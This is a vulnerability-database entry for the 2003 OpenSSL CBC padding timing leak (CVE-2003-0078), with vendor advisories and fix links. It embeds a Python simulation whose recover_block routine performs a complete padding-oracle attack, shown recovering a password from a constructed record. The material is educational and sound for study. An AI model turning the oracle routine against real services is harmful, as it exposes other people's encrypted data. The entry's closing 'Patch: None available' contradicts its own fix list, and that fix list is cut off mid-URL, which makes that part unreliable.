OpenSSL CBC Error Information Disclosure Vulnerability

admin 2022-07-18 14:39:27 CNNVD Vulnerabilities Source: ZONE.CI 全球网

Vulnerability Details

OpenSSL CBC Error Information Disclosure Vulnerability

  • CNNVD ID: CNNVD-200303-024
  • Severity: Low
  • CVE ID: CVE-2003-0078
  • Vulnerability type: Design error
  • Published: 2003-03-03
  • Threat type: Remote
  • Updated: 2005-10-12
  • Vendor: openbsd
  • Source: Discovery credited...

Vulnerability Summary

ssl3_get_record in s3_pkt.c in OpenSSL before 0.9.7a, and in 0.9.6 before 0.9.6i, does not perform the MAC computation when a record carries incorrect block-cipher padding. The result is an information leak (a timing discrepancy): a bad-padding failure returns measurably faster than a bad-MAC failure, so an attacker who can submit modified ciphertext to the receiver learns whether its decryption produced valid padding. That distinction is exactly what CBC padding-oracle attacks need, and it can allow the original plaintext to be extracted. The issue is also known as the "Vaudenay timing attack".
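The record check described above, and the attack it enables, as an added simulation that is not OpenSSL's code. It assumes a toy 16-byte Feistel block cipher built on SHA-256 (so the block runs with the standard library alone), an HMAC-SHA1 record MAC, TLS 1.0 style padding (n + 1 trailing bytes all equal to n), and a counter of MAC computations standing in for the wall-clock timing an attacker would measure over the network. The vulnerable receiver returns before the MAC when padding is bad; the fixed receiver runs the MAC regardless. recover_block then recovers a full plaintext block from the vulnerable receiver using nothing but that oracle, and gets garbage from the fixed one. Keys, IV and the captured plaintext are constructed for the example.

```python
# Constructed simulation of the CVE-2003-0078 record check and the padding-oracle attack it
# enables. Stdlib only: a toy Feistel cipher over SHA-256 stands in for the block cipher.
import hashlib
import hmac

BLOCK, MAC_LEN, ROUNDS = 16, 20, 4   # block size, HMAC-SHA1 length, Feistel rounds

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, rnd):  # Feistel round function: keyed SHA-256 cut to the 8-byte half block
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in range(ROUNDS):
        l, r = r, _xor(l, _f(key, r, rnd))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in reversed(range(ROUNDS)):
        l, r = _xor(r, _f(key, l, rnd)), l
    return l + r

def cbc_encrypt(key, iv, data):
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, data):
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        out += _xor(block_decrypt(key, data[i:i + BLOCK]), prev)
        prev = data[i:i + BLOCK]
    return out

def tls_pad(data):  # TLS 1.0 padding: n + 1 trailing bytes, every one equal to n
    n = (BLOCK - (len(data) + 1) % BLOCK) % BLOCK
    return data + bytes([n]) * (n + 1)

def seal_record(enc_key, mac_key, iv, plaintext):  # iv || CBC(plaintext || HMAC || padding)
    tag = hmac.new(mac_key, plaintext, hashlib.sha1).digest()
    return iv + cbc_encrypt(enc_key, iv, tls_pad(plaintext + tag))

class RecordLayer:
    """Receiver. mac_ops stands in for the time an attacker measures on the wire."""
    def __init__(self, enc_key, mac_key, fixed):
        self.enc_key, self.mac_key, self.fixed, self.mac_ops = enc_key, mac_key, fixed, 0

    def _mac(self, data):
        self.mac_ops += 1
        return hmac.new(self.mac_key, data, hashlib.sha1).digest()

    def open_record(self, record):
        iv, body = record[:BLOCK], record[BLOCK:]
        if not body or len(body) % BLOCK:
            return None
        dec = cbc_decrypt(self.enc_key, iv, body)
        n = dec[-1]
        pad_ok = n + 1 + MAC_LEN <= len(dec) and dec[-(n + 1):] == bytes([n]) * (n + 1)
        if not pad_ok:
            if self.fixed:
                self._mac(dec[:-MAC_LEN])  # fixed: spend the MAC time anyway, then fail
            return None                    # vulnerable: fails fast, MAC never computed
        msg, tag = dec[:-(n + 1 + MAC_LEN)], dec[-(n + 1 + MAC_LEN):-(n + 1)]
        return msg if hmac.compare_digest(self._mac(msg), tag) else None

def padding_oracle(server, record):  # attacker's view: slow (MAC ran) or fast (early exit)?
    before = server.mac_ops
    server.open_record(record)
    return server.mac_ops != before

def recover_block(server, record, idx):
    """Recover plaintext block idx from padding-oracle answers alone (no key needed)."""
    iv, body = record[:BLOCK], record[BLOCK:]
    blocks = [body[i:i + BLOCK] for i in range(0, len(body), BLOCK)]
    prev, target = (iv if idx == 0 else blocks[idx - 1]), blocks[idx]
    filler = bytes(BLOCK) * 2  # any bytes; keeps the forged record long enough for every pad length
    known = bytearray(BLOCK)

    def query(mask):  # last decrypted block of the forgery is P_target XOR mask
        return padding_oracle(server, iv + filler + _xor(prev, mask) + target)

    for i in range(BLOCK - 1, -1, -1):
        n = BLOCK - 1 - i           # pad length whose run starts exactly at byte i
        mask = bytearray(BLOCK)
        for j in range(i + 1, BLOCK):
            mask[j] = known[j] ^ n  # steer already recovered bytes to the pad value n
        for g in range(256):
            mask[i] = g
            if not query(bytes(mask)):
                continue
            if i == BLOCK - 1:      # a hit could also be a longer run; touching byte 14 breaks that case
                mask[i - 1] ^= 0xFF
                longer_run = not query(bytes(mask))
                mask[i - 1] ^= 0xFF
                if longer_run:
                    continue
            known[i] = g ^ n
            break
    return bytes(known)
```

With a sealed record of the constructed plaintext b"POST /login user=alice&password=hunter2 HTTP/1.0", recover_block(RecordLayer(k, m, fixed=False), rec, 2) returns the third block, b"hunter2 HTTP/1.0", after at most 257 oracle queries per byte; against fixed=True every query looks the same and the routine returns nonsense. Two caveats a practitioner should keep in mind: in real SSL/TLS every failed record tears down the session, so the 2003 attack needed the same secret re-sent at the same position in many sessions, and equalising the padding branch does not remove all length-dependent MAC timing, which is why CBC timing work on TLS continued after this fix.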

Vulnerability Announcement

  • Computer Associates: certain versions of eTrust Security Command Center are reported to be prone to this vulnerability. Customers are advised to contact the vendor for information on obtaining and applying the appropriate updates.
  • Hewlett-Packard: advisory HPSBUX0309-280 contains fix information for J2SE and JSSE; customers are advised to upgrade as soon as possible. HP has also released advisory HPSBUX0303-248 (rev. 1 and rev. 2) to address this issue.
  • NetBSD: advisory 2003-001 addresses this issue.
  • OpenSSL: administrators and users are advised to upgrade to version 0.9.6i or 0.9.7a.
  • OpenPKG: upgrade RPMs have been released.
  • Conectiva: advisory CLA-2003:570 addresses this issue.
  • Debian: advisory DSA 253-1 addresses this issue.
  • Gentoo Linux: users running 'dev-libs/openssl' should upgrade to 'openssl-0.9.6i' or 'openssl-0.9.7a' with: emerge sync; emerge -u openssl; emerge clean
  • Mandrake: advisory MDKSA-2003:020 addresses this issue.
  • Trustix: advisory TSLSA-2003-0005 addresses this issue.
  • EnGarde: advisory ESA-20030220-005 addresses this issue.
  • FreeBSD: an updated Security Advisory has been released; users are advised to apply the new patches or to upgrade via CVS.
  • OpenBSD: security patches have been released; further information is available from the OpenBSD errata pages.
  • SuSE: advisory SuSE-SA:2003:011 addresses this issue.
  • Apple: an advisory containing a fix has been released; further information is available from the Apple Security Update page.
  • Red Hat Linux: advisory RHSA-2003:062-11 contains fixes.
  • Sun: updated versions of the affected products have been released, and a Sun alert states that the issue is addressed in the latest release of JSSE, SDK, and JRE.
  • Oracle: an advisory and patches have been released; users are advised to obtain patches from the Oracle Metalink site listed in the references.

For each advisory above, see the referenced advisory for details on obtaining and applying fixes.

Fixes available:

OpenBSD OpenBSD 3.2

  • OpenBSD 007_ssl.patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.2/common/007_ssl.patch
Sun Cobalt RaQ 4
  • Sun RaQ4-All-Security-2.0.1-16343.pkg http://ftp.cobalt.sun.com/pub/packages/raq4/eng/RaQ4-All-Security-2.0.1-16343.pkg
Sun Cobalt RaQ 550
  • Sun RaQ550-All-Security-0.0.1-16343.pkg http://ftp.cobalt.sun.com/pub/packages/raq550/all/RaQ550-All-Security-0.0.1-16343.pkg
Sun Cobalt RaQ XTR
  • Sun RaQ550-All-Security-0.0.1-16343.pkg http://ftp.cobalt.sun.com/pub/packages/raq550/all/RaQ550-All-Security-0.0.1-16343.pkg
  • Sun RaQXTR-All-Security-1.0.1-16343.pkg http://ftp.cobalt.sun.com/pub/packages/raqxtr/eng/RaQXTR-All-Security-1.0.1-16343.pkg
Sun Cobalt Qube 3
  • Sun Qube3-All-Security-4.0.1-16343.pkg http://ftp.cobalt.sun.com/pub/packages/qube3/ml/Qube3-All-Security-4.0.1-16343.pkg
OpenBSD OpenBSD 3.1
  • OpenBSD 021_ssl.patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.1/common/021_ssl.patch
OpenSSL Project OpenSSL 0.9.3
  • OpenSSL Project openssl-0.9.6i.tar.gz (OpenSSL 0.9.6i upgrade) http://www.openssl.org/source/openssl-0.9.6i.tar.gz
OpenSSL Project OpenSSL 0.9.4
  • OpenSSL Project openssl-0.9.6i.tar.gz (OpenSSL 0.9.6i upgrade) http://www.openssl.org/source/openssl-0.9.6i.tar.gz
OpenSSL Project OpenSSL 0.9.5a
  • Mandrake openssl-0.9.5a-9.4mdk.i586.rpm (Mandrake Linux 7.2) http://www.mandrakesecure.net/en/ftp.php
  • Mandrake openssl-devel-0.9.5a-9.4mdk.i586.rpm (Mandrake Linux 7.2) http://www.mandrakesecure.net/en/ftp.php
  • OpenSSL Project openssl-0.9.6i.tar.gz (OpenSSL 0.9.6i upgrade) http://www.openssl.org/source/openssl-0.9.6i.tar.gz
OpenSSL Project OpenSSL 0.9.5
  • OpenSSL Project openssl-0.9.6i.tar.gz (OpenSSL 0.9.6i upgrade) http://www.openssl.org/source/openssl-0.9.6i.tar.gz
OpenSSL Project OpenSSL 0.9.6d
  • OpenSSL Project openssl-0.9.6i.tar.gz (OpenSSL 0.9.6i upgrade) http://www.openssl.org/source/openssl-0.9.6i.tar.gz
OpenSSL Project OpenSSL 0.9.6c
  • Conectiva openssl-0.9.6-4U60_5cl.i386.rpm (Conectiva Linux Version 6.0) ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssl-0.9.6-4U60_5cl.i386.rpm
  • Conectiva openssl-0.9.6-4U60_5cl.src.rpm (Conectiva Linux Version 6.0) ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/openssl-0.9.6-4U60_5cl.src.rpm
  • Conectiva openssl-0.9.6c-2U80_4cl.i386.rpm (Conectiva Linux Version 8.0) ftp://atualizacoes.conectiva.com.br/8/RPMS/openssl-0.9.6c-2U80_4cl.i386.rpm
  • Conectiva openssl-0.9.6c-2U80_4cl.src.rpm (Conectiva Linux Version 8.0) ftp://atualizacoes.conectiva.com.br/8/SRPMS/openssl-0.9.6c-2U80_4cl.src.rpm
  • Conectiva openssl-devel-0.9.6-4U60_5cl.i386.rpm (Conectiva Linux Version 6.0) ftp://atualizacoes.conecti

References

  • Source: www.openssl.org, Link: http://www.openssl.org/news/secadv_20030219.txt
  • Source: BUGTRAQ, Name: 20030219 [OpenPKG-SA-2003.013] OpenPKG Security Advisory (openssl), Link: http://marc.theaimsgroup.com/?l=bugtraq&m=104568426824439&w=2
  • Source: XF, Name: ssl-cbc-information-leak(11369), Link: http://www.iss.net/security_center/static/11369.php
  • Source: DEBIAN, Name: DSA-253, Link: http://www.debian.org/security/2003/dsa-253
  • Source: TRUSTIX, Name: 2003-0005, Link: http://www.trustix.org/errata/2003/0005
  • Source: BID, Name: 6884, Link: http://www.securityfocus.com/bid/6884
  • Source: REDHAT, Name: RHSA-2003:205, Link: http://www.redhat.com/support/errata/RHSA-2003-205.html
  • Source: REDHAT, Name: RHSA-2003:104, Link: http://www.redhat.com/support/errata/RHSA-2003-104.html
  • Source: REDHAT, Name: RHSA-2003:082, Link: http://www.redhat.com/support/errata/RHSA-2003-082.html
  • Source: REDHAT, Name: RHSA-2003:063, Link: http://www.redhat.com/support/errata/RHSA-2003-063.html
  • Source: REDHAT, Name: RHSA-2003:062, Link: http://www.redhat.com/support/errata/RHSA-2003-062.html
  • Source: OSVDB, Name: 3945, Link: http://www.osvdb.org/3945
  • Source: MANDRAKE, Name: MDKSA-2003:020, Link: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2003:020
  • Source: ENGARDE, Name: ESA-20030220-005, Link: http://www.linuxsecurity.com/advisories/engarde_advisory-2874.html
  • Source: CIAC, Name: N-051, Link: http://www.ciac.org/ciac/bulletins/n-051.shtml
  • Source: GENTOO, Name: GLSA-200302-10, Link: http://marc.theaimsgroup.com/?l=bugtraq&m=104577183206905&w=2
  • Source: BUGTRAQ, Name: 20030219 OpenSSL 0.9.7a and 0.9.6i released, Link: http://marc.theaimsgroup.com/?l=bugtraq&m=104567627211904&w=2
  • Source: CONECTIVA, Name: CLSA-2003:570, Link: http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000570
  • Source: SGI, Name: 20030501-01-I, Link: ftp://patches.sgi.com/support/free/security/advisories/20030501-01-I
  • Source: NETBSD, Name: NetBSD-SA2003-001, Link: ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-001.txt.asc

Affected Entities

  • OpenBSD OpenBSD 3.2
  • OpenBSD OpenBSD 3.1

Patch

    None available
